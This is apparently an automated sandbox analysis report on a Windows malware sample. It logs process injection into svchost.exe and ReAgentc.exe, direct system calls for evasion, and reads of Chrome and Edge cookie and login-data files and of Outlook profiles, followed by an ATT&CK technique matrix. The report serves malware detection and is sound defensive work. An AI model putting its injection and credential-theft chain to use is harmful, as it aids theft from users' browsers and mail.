                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]2_2_030649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]2_2_030FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]2_2_030BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]2_2_030BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]2_2_0306A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]2_2_03042840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060854 mov eax, dword ptr fs:[00000030h]2_2_03060854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]2_2_03034859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]2_2_03034859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]2_2_030BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]2_2_030BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]2_2_030C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]2_2_030C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030887 mov eax, dword ptr fs:[00000030h]2_2_03030887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC89D mov eax, dword ptr fs:[00000030h]2_2_030BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E8C0 mov eax, dword ptr fs:[00000030h]2_2_0305E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA8E4 mov eax, dword ptr fs:[00000030h]2_2_030FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h]2_2_0306C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h]2_2_0306C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E6F00 mov eax, dword ptr fs:[00000030h]2_2_030E6F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032F12 mov eax, dword ptr fs:[00000030h]2_2_03032F12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CF1F mov eax, dword ptr fs:[00000030h]2_2_0306CF1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EF28 mov eax, dword ptr fs:[00000030h]2_2_0305EF28
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00F680A9
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F3A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F3A155
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F3A124 SetUnhandledExceptionFilter,0_2_00F3A124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\ReAgentc.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: NULL target: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: NULL target: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeThread register set: target process: 1488Jump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeThread APC queued: target process: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeJump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 270008Jump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F687B1 LogonUserW,0_2_00F687B1
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F13B3A
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F148D7
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F74C7F mouse_event,0_2_00F74C7F
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe"Jump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeProcess created: C:\Windows\SysWOW64\ReAgentc.exe "C:\Windows\SysWOW64\ReAgentc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F67CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00F67CAF
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F6874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00F6874B
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: ASmwljQNPNM.exe, 00000003.00000000.2226148584.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, ASmwljQNPNM.exe, 00000003.00000002.4582389851.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000000.2372012507.00000000017B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, ASmwljQNPNM.exe, 00000003.00000000.2226148584.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, ASmwljQNPNM.exe, 00000003.00000002.4582389851.0000000000D31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: ASmwljQNPNM.exe, 00000003.00000000.2226148584.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, ASmwljQNPNM.exe, 00000003.00000002.4582389851.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000000.2372012507.00000000017B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: ASmwljQNPNM.exe, 00000003.00000000.2226148584.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, ASmwljQNPNM.exe, 00000003.00000002.4582389851.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000000.2372012507.00000000017B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F3862B cpuid 0_2_00F3862B
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F44E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F44E87
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F51E06 GetUserNameW,0_2_00F51E06
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F43F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00F43F3A
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F149A0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.4e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.4e0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2303693143.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4582561177.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4584397625.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4582603239.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4582671918.0000000003830000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4581793209.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2303461712.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2304351781.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\ReAgentc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeBinary or memory string: WIN_81
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeBinary or memory string: WIN_XP
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeBinary or memory string: WIN_XPe
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeBinary or memory string: WIN_VISTA
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeBinary or memory string: WIN_7
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeBinary or memory string: WIN_8
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.4e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.4e0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2303693143.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4582561177.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4584397625.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4582603239.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4582671918.0000000003830000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4581793209.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2303461712.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2304351781.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F86283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00F86283
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F86747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00F86747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                1
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                2
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
